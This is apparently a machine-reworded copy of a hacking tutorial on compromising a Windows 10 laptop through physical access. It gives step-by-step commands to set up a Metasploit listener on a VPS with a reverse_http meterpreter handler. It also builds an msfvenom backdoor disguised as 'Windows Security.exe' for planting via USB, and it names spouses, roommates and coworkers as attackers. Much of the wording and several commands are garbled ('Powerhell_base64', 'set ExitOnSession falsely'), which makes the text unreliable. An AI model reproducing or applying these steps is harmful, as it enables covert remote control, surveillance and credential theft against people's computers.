How to Open Somebody's Computer Without a Password (Setting Up the Payload)

A used Windows 10 laptop can be compromised in less than three minutes. With the click of a few buttons, a hacker can remove all antivirus software, create a backdoor, capture webcams and passwords, among other sensitive personal details.

The question you think is possible now is why would a hacker do this on my laptop? The answer here is simple - there is value in any computer or online account, even your mother's Pinterest. While many believe that they have nothing to lose or that they have nothing to hide, they should not underestimate the power and reason of the inspector.

By infiltrating your Windows 10 computer, an attacker can turn it into a web server for the crime of stealing sensitive information, malware, spam, and location and distributing other unwanted content. They can also pick up contacts, spam others from your email, get tangible assets, hack your reputation, get all your account credentials, use your computer to do bot work, and much more.

Although no sensitive data is stored on the device, it is still possible for hackers to do illegal work using the specified device. Any illegal activity from this device can link to the victim and lead to severe fines, court action, or even imprisonment.

Don't MissHack any Computer Over Wi-Fi with the WIFI Duck Payload Deliverer

It is also understandable to think that a damaged computer is not the target of hackers. If the owner is employed in a high-value business or company, the company can be a real attacker of the attacker. The damaged computer, which connects to the company's network, will act as an access device that allows the attacker to do illegal activity or roam around other devices on the network.

Understanding Attacks

In this article, I will show how hackers with physical access to a target computer can easily hit the phone. This is great for a white hat or pentester to add to their arsenal of skills, as well as regular users who wish to prevent these types of attacks.
For most users who are unfamiliar with Windows 10, attackers may view files and folders on their computer after being completely deleted - even without knowing their password.

Two USB flash drives will be required to perform this attack. USB # 1 will be used to create a "live USB" that will start on the target computer, while USB # 2 carries the load that will be released later on the specified device. After creating a live USB on the first drive, you will no longer be able to store files (i.e., paid load) on them, which is why a second USB flash drive is needed.

These attacks can be carried out by coworkers, neighbors, hotel staff, roommates, friends, spouses, or anyone with a USB flash drive and three minutes of physical access to a targeted computer. The attacker will also be able to back up to a targeted computer using Metasploit, making it easy to maintain long-term and long-distance communication with the target device as it travels to different Wi-Fi networks anywhere in the world.

Step 1: Create Live USB

Live USB is an internal or external disk drive that contains a complete operating system that is computer-generated without the use of an internal computer system. Many modern computers and desktop computers support booting from live USBs without security considerations.

Don't Miss: Recover a Windows Password with Ophcrack

Popular software designed to create live USBs including Rufus and LinuxLive USB Creator. However, I recommend Etcher, a cross-platform and open-source utility designed to make creating bootable USBs as easy as possible.

A lightweight Linux ISO is recommended, as it will allow Etcher to make live USB faster. Any Linux ISO that allows users to try the operating system without installing it will work fine.

When Etcher is finished, disconnect the USB from the computer. USB can now be used to view and convert sensitive files on Windows 10-enabled computers.

Step 2 : Set up your VPS

A virtual private server (VPS) is required to host a Metasploit listener. This is a server whose damaged device will connect to it.
VPS purchases have been integrated into Null Byte before most of the time, so I won't go into the specifications here. If this is an unusual idea, check out our general guide on choosing the best VPS provider. Any Debian based VPS with at least 1,024 MB of RAM and 1 CPU core is enough to use Metasploit.

Step 3 : Install Metasploit on VPS

Metasploit developers created a simple input script that will make the entire installation process accessible. To get started, download the install script, and save it to a local file, which can be done with the command below.

  • curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb> msfinstall

After that, make sure the file has enough permissions to run on your VPS using the chmod command.

  • sudo chmod 755 msfinstall

Lastly, use the newly created "msfinstall" file as root to install Metasploit.

  • sudo ./msfinstall

The installation of Metasploit should complete in less than two minutes. The installer script worked flawlessly for me using Debian 9 VPS. For details on installing Metasploit in other distributions, see the official installation instructions by Rapid7, the developers of Metasploit.

Step 4 : Install Screen on VPS

"Screen" is a program that allows users to manage multiple storage times within the same console. It has the ability to "remove," or close, the last window without losing the information that works on the terminal.

Don't Miss: Automate Wi-Fi Hacking with Wifite2 2020 Easy Method

For example, Metasploit will need to continue operating after the SSH session on VPS is closed. If Metasploit is started and the end of SSH is closed immediately, Metasploit will stop working on the VPS. Therefore, you will use the Screen to keep Metasploit running in the background. Below is a GIF example where I kept the nano running on the Screen system.

To install the Screen, use the recovery command below.

  • sudo apt-get install screen

To view current screen times, use the command below. If no screen times are running in the background, the command will report "No found bases found."

  • screen -list

To start a new Screen session, simply tap the screen on the signal, and press Enter.

  • screen

The screen will show some copyright and license information. Press the re-enter button and ignore it. Once in the session, everything that happens inside the signal will be saved - whether you close the end window or shut down your computer.

The -r argunment can be used to reconnect to the active Screen session.

  • screen -r SESSION-NAME-HERE

The above instructions should be sufficient to make anyone start with the Screen and manage sessions. For a full screen view, check out Tebaut Rousseau's post on DEV.

Step 5 : Configure Metasploit

Metasploit provides automation with "resource Scripts." This can be easy for hackers who use Metasploit regularly and do not want to type the same commands over and over again to set up Metasploit.
To create a resource script, use the nano command to create a file on the VPS using the command below.

  • nano ~/automate.rc

This will create an "automate.rc" file in the home folder. The script below should be copied and pasted into the nano terminal.

  • use multi/handler
  • set payload windows/meterpreter/reverse_http
  • set up your LHOST.VPS.IP.Here
  • set LPORT 80
  • set ExitOnSession falsely
  • set true EnableStageEncoding
  • exploitation -j

Let's do a breakdown of this text before moving on, to see what it means.

  • The payload type used is "windows / meterpreter / reverse_http." This will create an HTTP connection between the targeted machines and the attackers. Attackers will sometimes use HTTP connections via standard TCP to avoid DPI (deep packet testing). TCP packets relay to unfamiliar ports (e.g., port 4444, port 55555, etc.) can be accessed by anyone monitoring traffic that transfers to or from a compromised device.
  • LHOST is the IP address of the attacker server that uses Metasploit. Your IP IP Here in the resource file should be changed to the IP address of the attacker VPS.
  • LPORT specifies the destination port. HTTP data transfers over port 80 automatically. Suddenly to escape DPI, port 80 was used.
  • This exploit will start automatically when the automate.rc file is run using msfconsole.

When you have copied the text to the blockquote above and pasted it into the nano, save and close the nano by pressing Ctrl + X, then Y, and then pressing the keyboard.

Msfconsole can now be started using the command below.

  • screen msfconsole -r ~/automate.rc

Step 6 : Create Payload

Msfvenom is a combination of Msfpayload and Msfencode, putting both tools in the same frame. Msfvenom is an example of a Metasploit command line used to produce and extract all the different types of shellcode found in Metasploit. Most of the time, a green Shellcode can be encoded to make it work properly.

A simple, unused upload of Msfvenom technology was used during this test. In the real world, attackers will use advanced software for virtually any task and may even be able to avoid the virus. If antivirus software is removed during an attack, a basic download of Msfvenom may suffice.

Don't Miss: How to Hack Facebook Without Phishing SOP (Same Origin Policy)

Kali Linux was used to produce the Msfvenom made in this study. To create a paid load using Msfvenom, type the command below in the terminal.

  • msfvenom --encoder cmd/Powerhell_base64 --payload windows/meterpreter/reverse_http LHOST=YourVpsIpHere LPORT=80 --arch x86 --platform win --format exe --out ~ /'Windows Security.exe'

There is a lot going on in the above command, so let me break it.

  • --encoder: This includes the upload code so that it can bypass access systems by changing the original file signature file to a different format. The type of encoder used here is "Powerhell_base64." PowerShell is a scripting language developed by Microsoft to help IT professionals improve systems and perform administrative tasks. Hackers have been using and harassing PowerShell to achieve their goals since 2006 when it was introduced in Windows XP and Vista operating systems.
  • --payload: The payload type used is "windows / meterpreter / reverse_http." This upload must be accompanied by the type of paid download used in the automate.rc resource file created in the previous step.
  • LHOST = YourVpsIpHere: LHOST is the IP address of the attacker server using Metasploit. This IP address must match the LHOST used in the automate.rc resource file created in the previous step.
  • LPORT = 80: LPORT specifies the destination port. This port number must match the LPORT used in the automate.rc resource file created in the previous step.
  • --arch x86: Older Windows (32-bit) computers use x86 architecture and are unable to make 64-bit efficient operations. 64 new Windows computers can use x86 or x64 architecture. It makes sense for attackers to use x86 architecture to cover multiple Windows users.
  • --platform win: This specifies the specified platform. Other platforms include Android, MacOS, Unix, and Solaris. In the case of this example, the "win" (Windows) platform has been used.
  • --format exe: Here the output format is specified as EXE or "active." This will work on Windows computers without user input.
  • --out: Attackers will often name viruses and background after something you believe such as "Windows Security," "Windows Update," or "explorer.exe" to convince users that the operating system is harmless or suspicious. Outout defines the name of the active payment load.

Step 7 : Create a USB Payload

After performing the Msfvenom upload, it will need to be stored on a second USB flash drive. Just insert a second USB into the computer with the EXE upload, then drag and drop the download into it. That's all there is to creating a USB upload.

Get Ready to Exploit the system

In this guide, live USB was created, Metasploit was installed and installed on the remote server, and a simple upload of Msfvenom was made. With all that set and ready to go, it is now possible to access the targeted computer in dynamic mode, uninstall Windows Defender (and other security software), and embed the paid download on the device. The payload will apply each time the device restarts, creating new connections between the compromised computer and the attacker server.

Post a Comment